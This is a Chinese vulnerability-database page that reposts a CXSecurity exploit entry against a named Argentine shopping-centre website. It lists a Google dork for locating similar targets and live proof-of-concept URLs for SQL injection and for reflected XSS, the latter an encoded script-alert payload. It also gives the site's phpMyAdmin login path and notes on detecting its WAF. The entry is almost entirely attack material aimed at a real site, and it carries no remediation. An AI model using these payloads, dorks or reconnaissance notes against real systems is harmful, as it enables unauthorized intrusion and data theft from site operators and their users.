La Paz Shopping (SQL Injection / XSS Reflected) - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1740018 漏洞类型
发布时间 2019-09-14 更新时间 2019-09-14
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019090102
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Exploit Title: La Paz Shopping (SQL Injection / XSS Reflected)
Discovered By: intrackeable
Date: 13/09/2019
Tested On: Linux Kubuntu
Google Dork: "inurl:.php?id= site:.ar intext:shopping"
Category: WebApps
Vulnerability Type: CWE-89 / CWE-79
Vendor Home Page: lapazshopping.com.ar
PoC: 
http://www.lapazshopping.com.ar/locales-interior.php?id=27%27

http://lapazshopping.com.ar/locales.php?action=buscar&button2=Buscar&marca=0027&rubro=%3C%2Fscript%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3B%3C%2Fscript%3E%3Cscript%3E

Admin Login Paths:
http://lapazshopping.com.ar/phpmyadmin
WAF Detection: 
The site http://lapazshopping.com.ar seems to be behind a WAF or some sort of security solution.
The server header for a normal response is "Microsoft-IIS/10.0", while the server header a response to an attack is "Microsoft-HTTPAPI/2.0.",